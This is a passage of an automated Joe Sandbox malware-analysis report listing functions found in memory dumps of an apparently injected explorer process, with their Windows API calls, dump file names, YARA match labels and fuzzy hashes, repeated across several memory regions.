                                                                                                                                                                                                                          • Part of subcall function 0E0A21D1: _getptd_noexit.LIBCMT ref: 0E0A21D7
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E0A4336
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E0A4342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: d5f1f599474da70cfea46aa029aa5caf57483874c95bb3ac20670788dd340583
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1318C35218B088FCB78EF99C491BA9B3E1FB98310F55096DD59A87251DB71FC42CB82
                                                                                                                                                                                                                        Function 0E10A510 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0E10A56F
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: EnterCriticalSection.KERNEL32 ref: 0E108FE8
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: RtlInitializeCriticalSection.NTDLL ref: 0E108FF5
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10902A
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10904D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10905D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10906D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: LeaveCriticalSection.KERNEL32 ref: 0E1090F4
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: memcpy.MSVCRT ref: 0E10910C
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrlenA.KERNEL32 ref: 0E10911A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0E10A596
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10A60A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0E10A615
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction ID: 2b747f8fee752c35aec53455e17936b21fe7da5a9e4506e6752c7bb91d9de3ae
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F821807121AB81C5EB14DF22F85039AB7E5FB88B84F448825DA8D47B98EFBCC584C741
                                                                                                                                                                                                                        Function 0FF4A510 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0FF4A56F
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: EnterCriticalSection.KERNEL32 ref: 0FF48FE8
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: RtlInitializeCriticalSection.NTDLL ref: 0FF48FF5
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4902A
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4904D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4905D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4906D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: LeaveCriticalSection.KERNEL32 ref: 0FF490F4
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: memcpy.MSVCRT ref: 0FF4910C
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrlenA.KERNEL32 ref: 0FF4911A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0FF4A596
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4A60A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0FF4A615
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction ID: 9f3a52a47a4a16f4adad46efdfd43144b326c790a0bed624c51fb5740ee60936
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD215E31609B42C5EB24DF21A84036ABBA5FF88BC4F848135DA8947B15EF3CD159C744
                                                                                                                                                                                                                        Function 0DEF4379 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: f8f179cae309b43c4cd9b016149054a33b82aae11ec098de20bb118da8b1cdf1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DE0ED3851511ACFD7267F6485493B532A1FF59219F8761A1CB84CA1A1EFBCC4C08A57
                                                                                                                                                                                                                        Function 08244379 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 54ec7f6e6730d54ecb092a6c70aad0e91bd150e3e5f09bc5e448fe25d22e7d26
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2E06D38131006CEC72D7B6481083A436A0FF58207F5662A5CD498B222D7BC14C28ABB
                                                                                                                                                                                                                        Function 0E0A4379 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 5e2348aa170b0d80cfac9288b1caebf4b1f1f3cdd538952d647cdcf464c4c38e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5E0C23D51011DCED7697BE486593A832E0EB69216F8E4AF1CB648B221D7FC4CC58A53
                                                                                                                                                                                                                        Function 0DFC4A44 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 9169f89687ad1d34fbab05cd67e56773dae6e53fc4a72c6111d06e7b8b07d529
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0E06D36904206C6C7253FAC86143BC3260F78CB16F86F06A87004B300C7BDE9A48A1A
                                                                                                                                                                                                                        Function 0E124A44 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 86cfe8556af3ad73f17f410c99fd7080284e15f30e7204162b0ba0a2118faac8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE0ED36610274CAC729ABA48C443AC36E0E7DC706F969879876647310C7BD8DE4CB56
                                                                                                                                                                                                                        Function 0FF64A44 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: f6eaca4a3c3c4bb08f5c59e2ba02fa9798adbbefebec15451db8275a53ff3182
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27E0ED3A900344EACB25BFA48C043EC3660EB9CB06FEA95A2865447343CFBD55848B5A
                                                                                                                                                                                                                        Function 0DFA4550 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction ID: 780178405b681d24f968c773cb7c05070db7a4fea0704bec9cc0c454d701698c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A21F9E1E546525EEB30DB5DEC5133E23D8AB00FA6F04C42FD54A82920DFECC1989A50
                                                                                                                                                                                                                        Function 0E104550 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction ID: 55f761ff8c9812d7113ed45a0be0308434e9511b85a6c0da8063795c2c54f8b8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04213EF0E60A5156FF349B12E5D037E22E46704BB6F64481AD771919D8EFECCCD88A41
                                                                                                                                                                                                                        Function 0FF44550 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction ID: f801d9048bcedef9071159e12083f50750f258f8ec4548743a9f13d9ca7c43cb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B21C521E4465256FF30DB21E45037E2AD4BF00FE6FC44836DD61AA912DF2CF09C9A40
                                                                                                                                                                                                                        Function 0E108400 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0
                                                                                                                                                                                                                        • Opcode ID: 5aad866f40af7152a324c12d8ab028949bc82d9e846d66ebce9f25498e0832bc
                                                                                                                                                                                                                        • Instruction ID: f11d05c04ca00ae0813a5729f115513f7bc5c21610ac7d3299185ce8cbb91133
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aad866f40af7152a324c12d8ab028949bc82d9e846d66ebce9f25498e0832bc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13318731208B8086EB28CF35E45436AB3A1F788BA8F548625DA5D877D8DF78C981CB50
                                                                                                                                                                                                                        Function 0FF48400 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0
                                                                                                                                                                                                                        • Opcode ID: 5aad866f40af7152a324c12d8ab028949bc82d9e846d66ebce9f25498e0832bc
                                                                                                                                                                                                                        • Instruction ID: 89c1ea5d478906aa070cc07da1e97def2897053eee2e25f66693977a595ef2f9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aad866f40af7152a324c12d8ab028949bc82d9e846d66ebce9f25498e0832bc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6316F32604B4186EB209F25E49437AB7A1FF88BDCF448225DA6947B69DF3CE041CB50
                                                                                                                                                                                                                        Function 0DFB05D0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3932841890-0
                                                                                                                                                                                                                        • Opcode ID: 35c7cf5c9dce3ef05f42222c4c6bc8a40775403081b3664b47b5e8d14574e34b
                                                                                                                                                                                                                        • Instruction ID: 9046087706b0cc5f185a534fd6840c441e76d17c3e589f0ae7273119acd3ba54
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35c7cf5c9dce3ef05f42222c4c6bc8a40775403081b3664b47b5e8d14574e34b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E016D2170175282EF489BA7B95832A6362EB89FC0F08D0368E0B07B68DE3CC0418710
                                                                                                                                                                                                                        Function 0E1105D0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3932841890-0
                                                                                                                                                                                                                        • Opcode ID: e94ebf82a3cff98267572f6be1f867c3b5543f0963eca30a540b896c03cda53a
                                                                                                                                                                                                                        • Instruction ID: 83d4c24ebc68afe807ab1fbb8f16d9ba082119da5cc5ae4963ec72a42d72b8a3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e94ebf82a3cff98267572f6be1f867c3b5543f0963eca30a540b896c03cda53a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33014B7170578182EF48DB67F95436EA3A1EB8DFC1F0898349E4A17B98DE3CC5818740
                                                                                                                                                                                                                        Function 0FF505D0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3932841890-0
                                                                                                                                                                                                                        • Opcode ID: e94ebf82a3cff98267572f6be1f867c3b5543f0963eca30a540b896c03cda53a
                                                                                                                                                                                                                        • Instruction ID: ef12a6f65de72821672ddb38bb3f58b14d7af7c5156b951d45d52b89266c052d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e94ebf82a3cff98267572f6be1f867c3b5543f0963eca30a540b896c03cda53a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9201692170174382EF68AB66B95833AA7A1FF89FC0F4890348E0A47B59DE3CD0469700
                                                                                                                                                                                                                        Function 0DFBD18C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
